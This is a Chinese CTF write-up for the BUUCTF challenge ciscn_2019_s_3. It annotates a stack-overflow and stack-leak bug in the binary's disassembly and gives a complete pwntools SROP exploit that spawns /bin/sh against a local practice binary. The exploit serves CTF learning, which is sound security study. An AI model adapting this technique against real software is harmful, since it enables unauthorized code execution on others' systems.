
pwnfeifei 2021-12-15 09:02 原文

 

先放个例题吧,原理后面有时间再更:BUUCTF ciscn_2019_s_3

保护只开了 NX:没有 canary(所以可以直接栈溢出覆盖返回地址),也没有 PIE(代码地址固定,下面的 0x4004xx 地址可以直接硬编码进 exp)。

1 signed __int64 vuln()
2 {
3   signed __int64 v0; // rax -- byte count returned by read(); never checked or used
4   char buf[16]; // [rsp+0h] [rbp-10h] BYREF -- only 16 bytes of stack
5 
6   v0 = sys_read(0, buf, 0x400uLL); // up to 0x400 bytes into a 16-byte buffer: plain stack overflow (no canary, NX only)
7   return sys_write(1u, buf, 0x30uLL); // echoes 0x30 bytes, i.e. 0x20 bytes past the end of buf: leaks the stack words above it
8 }
 1 .text:00000000004004ED vuln            proc near               ; CODE XREF: main+14↓p -- raw-syscall read/write, no libc calls
 2 .text:00000000004004ED
 3 .text:00000000004004ED buf             = byte ptr -10h         ; 16 bytes; with rsp == rbp it sits directly below the saved-rbp slot
 4 .text:00000000004004ED
 5 .text:00000000004004ED ; __unwind {
 6 .text:00000000004004ED                 push    rbp
 7 .text:00000000004004EE                 mov     rbp, rsp        ; NO sub rsp: the frame is never extended, [rsp] is the saved rbp
 8 .text:00000000004004F1                 xor     rax, rax        ; rax = 0 = SYS_read; the exploit returns to THIS address to re-enter
 9 .text:00000000004004F4                 mov     edx, 400h       ; count = 0x400, far more than buf holds
10 .text:00000000004004F9                 lea     rsi, [rsp+buf]  ; buf = rsp-10h, so input byte 16 onward overwrites [rsp], [rsp+8], ...
11 .text:00000000004004FE                 mov     rdi, rax        ; fd = 0 (stdin)
12 .text:0000000000400501                 syscall                 ; LINUX - sys_read
13 .text:0000000000400503                 mov     rax, 1          ; SYS_write
14 .text:000000000040050A                 mov     edx, 30h ; '0'  ; count = 0x30: buf plus the 4 qwords above it ([rsp] .. [rsp+18h]) go to stdout -> stack leak
15 .text:000000000040050F                 lea     rsi, [rsp+buf]  ; buf
16 .text:0000000000400514                 mov     rdi, rax        ; fd = 1 (stdout)
17 .text:0000000000400517                 syscall                 ; LINUX - sys_write -- 'syscall ; retn' at 0x400517 doubles as the exploit's syscall gadget
18 .text:0000000000400519                 retn                    ; no leave/pop rbp: pops [rsp], i.e. input bytes 16..23 become the return address
1 .text:00000000004004D6 gadgets         proc near               ; never needed as a whole; the exploit jumps straight to 0x4004DA
2 .text:00000000004004D6 ; __unwind {
3 .text:00000000004004D6                 push    rbp
4 .text:00000000004004D7                 mov     rbp, rsp
5 .text:00000000004004DA                 mov     rax, 0Fh        ; rax = 15 = SYS_rt_sigreturn
6 .text:00000000004004E1                 retn                    ; 'mov rax,0Fh ; retn' followed by a 'syscall' gadget is all SROP needs
7 .text:00000000004004E1 gadgets         endp ; sp-analysis failed
8 .text:00000000004004E1

很明显的 SROP:程序里有 `mov rax, 0Fh ; retn`(0xf = rt_sigreturn)和 `syscall ; retn` 两个 gadget,再加上 write 多输出的 0x20 字节能泄露一个栈地址,正好够伪造一个 sigreturn frame 去调 execve("/bin/sh")。要上课了,先把 exp 放出来吧。

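from pwn import *
import sys

context.log_level = 'debug'
context.arch = 'amd64'  # SigreturnFrame() builds an x86-64 frame only when arch is set

# Target binary: defaults to ./1 (the name used on this page); another path may be given as argv[1].
binary = sys.argv[1] if len(sys.argv) > 1 else './1'
s = process(binary)

# All addresses are fixed: the binary has no PIE.
read = 0x4004F1          # vuln+4: xor rax,rax ... syscall (read); re-enter here, skipping push rbp / mov rbp,rsp
syscall_ret = 0x400517   # syscall ; retn
mov_rax_0xf = 0x4004DA   # mov rax, 0Fh ; retn   (15 = SYS_rt_sigreturn)

# Round 1. vuln reads 0x400 bytes into a 16-byte buffer at rsp-0x10 and never moves rsp,
# so input bytes 16..23 land in the slot that its final `retn` pops. Put "/bin/sh\0" at the
# start of the buffer (it survives round 2, see below) and return into the read again.
# sendline()'s trailing '\n' hits the next slot (the return address into main); that slot
# is never used because we return to vuln+4 instead.
payload = b'/bin/sh\x00aaaaaaaa' + p64(read)
s.sendline(payload)

# vuln then writes 0x30 bytes starting at buf: the 16 buffer bytes followed by the 4 stack
# qwords above it. Skip the first 32 bytes (buf, our fake return slot, return-to-main) and
# take the 4th qword, [rsp+0x10], a saved frame pointer. recvn() blocks until exactly n
# bytes arrive; recv() may return a short read and make u64() fail.
s.recvn(32)
leaked_rbp = u64(s.recvn(8))
# 0x118 is the distance from that saved frame pointer down to the "/bin/sh" left in the
# round-1 buffer. It is a stack-layout constant for this binary (ASLR shifts both ends
# equally); re-measure it under a debugger if the binary or the calling frame differs.
bin_sh_addr = leaked_rbp - 0x118

# Round 2. The first `retn` popped one qword, so the re-entered read uses a buffer 8 bytes
# higher (old_rsp-8 .. old_rsp+8): the 16 'a's overwrite only the padding, and "/bin/sh\0"
# at old_rsp-0x10 is untouched. Chain: retn -> mov rax,0xf ; retn -> syscall (rt_sigreturn),
# which loads every register from the frame that follows on the stack and "returns" to
# syscall ; retn with rax = SYS_execve and rdi = &"/bin/sh". rsi/rdx are not set, so they
# keep the frame's default (zero): execve("/bin/sh", 0, 0).
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve  # 0x3b
sigframe.rdi = bin_sh_addr
sigframe.rip = syscall_ret

payload = b'a' * 0x10 + p64(mov_rax_0xf) + p64(syscall_ret) + bytes(sigframe)
s.send(payload)

s.interactive()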

 
